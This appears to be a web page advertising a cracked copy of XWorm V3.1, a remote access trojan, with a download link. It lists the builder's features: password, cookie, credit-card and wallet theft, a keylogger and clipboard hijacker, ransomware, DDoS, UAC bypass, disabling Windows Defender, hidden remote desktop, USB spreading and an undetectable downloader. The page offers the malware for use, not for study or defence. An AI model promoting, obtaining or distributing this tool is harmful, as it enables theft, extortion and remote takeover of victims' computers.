XWorm V3.1 Cracked

XWorm V3.1 Cracked


XWorm V3.1 Cracked

XWorm V3.1 Cracked is a remote access trojan (RAT) that is sold as a malware-as-a-service (MaaS). It is a modular malware, meaning that it can be customized to perform a variety of malicious tasks, such as:

  • Stealing sensitive data, such as passwords, credit card numbers, and cryptocurrency wallets
  • Launching distributed denial-of-service (DDoS) attacks
  • Deploying ransomware
  • Hijacking MetaMask and Telegram accounts
  • Tracking user activity

XWorm is typically delivered to victims’ computers through phishing emails or malicious attachments. Once installed, it will establish persistence on the system and contact its command and control (C2) server. The C2 server can then be used by the attacker to remotely control the infected computer and execute malicious commands.

Tools:Icon Changer – Multi Binder [Icon – Assembly] | Fud Downloader [HTA-VBS-JS-WSF] – XHVNC – BlockClients

⭐️ Builder
? | Schtasks – Startup – Registry | [Change Path]
? | TBotNotify – AntiKill – WDEX – Keylogger – Clipper – Sleep – Obfuscator |
?| AntiAnalysis – USB Spread – Icon – Assembly |
?| Icon Pack |
?Connection :
?| Stable Connection – Encrypted Connection – Encrypted Strings |
? Tools :
?| Check Port – Icon Changer – Multi Binder [Icon – Assembly – Obfuscator] |
?| Fud Downloader [HTA-VBS-JS-WSF] – BlockClients |
#⭐️ Features :
?Monitor [Mouse – Keyboard – AutoSave – Window]
?Run File [Disk – Link – Memory – Script – RunPE]
?WebCam [AutoSave]
?System Sound
?Open Url [Visible – Invisible]
?TCP Connections
?Registry Editor
?Process Manager

[adinserter block=”1″]

?✅ Clipboard Manager
?✅ Shell
?✅ Installed Programs
?✅ DDos Attack
?✅ VB.Net Compiler
?✅ Location Manager [GPS – IP]
?✅ File Manager
?✅ Client [Restart – Close – Uninstall – Update – Block – Note]
?✅ Power [Shutdown – Restart – Logoff]
#⭐️ Options :
?✅ BlankScreen [Enable – Disable]
?- ?✅ TaskMgr [Enable – Disable]
?✅ Regedit [Enable – Disable]
?✅ UAC [Enable – Disable]
?✅ Firewall [Enable – Disable]
?✅ Windows Update [Enable – Disable]
?✅ Invoke-BSOD
?✅ Bot killer
?✅ ResetScale
?✅ .Net 3.5 Install
?✅ DeleteRestore
?✅ WDExclusion
?✅ WDDisable
#⭐️ Password Recovery :
?✅ | Passwords – Cookies – CreditCards – Bookmarks – Downloads – Keywords – History – Autofill | [Chromium]
?- ?✅ | Passwords – Cookies – Bookmarks – History | [FireFox]
?✅ | All-In-One – Discord Tokens – ProductKey – InternetExplorer – FileZilla – Wifi Keys |
#⭐️ Pastime :
?✅ CD ROOM [Open – Close]
?✅ DesktopIcons [Show – Hide]
?✅ SwapMouse [Swap – Normal]
?✅ TaskBar [Show – Hide]
?✅ Screen [ON – OFF]
?✅ Volume [Up – Down – MUTE]
?✅ Start [Show – Hide]
?✅ Clock [Show – Hide]
?✅ Text Speak
?✅ Explorer [Start – Kill]
?✅ TrayNotify [Show – Hide]
#? Extra 1 :
?✅ ReportWindow
?✅ Performance
?✅ KeyLogger [Offline – Online]
?✅ Client Chat
?✅ FileSeacher
?✅ MessageBox
?✅ UAC Bypass [RunAs – Cmstp]
#? Extra 2 :
?✅ Ransomware [Encrypt – Decrypt]
?✅ Reverse Proxy
?✅ Ngrok Installer
?✅ HVNC | CommandPrompt – PowerShell – explorer | | EdgeBrowser – BraveBrowser – FireFoxBrowser – ChromeBrowser | [CloneProfile]
?✅ Hidden RDP
?✅ WDDisable
?✅ WDExclusion
#? Tasks :
?✅ GetKeylogger
?✅ Open Url [Visible – Invisible]
?✅ Recovery [Passwords – Cookies]
?✅ Run File [Disk – Link – Memory]
?✅ Update All Clients
#⚙️ Requirements :
?? .Net Framework 4.5 [Controller]
?? .Net Framework 4.0 [Client]
?⬆️ Size : 46.5 KB [Full Features]

Download XWorm V3.1 Cracked

XWorm V3.1 Cracked

XWorm V3.1 Cracked Download Link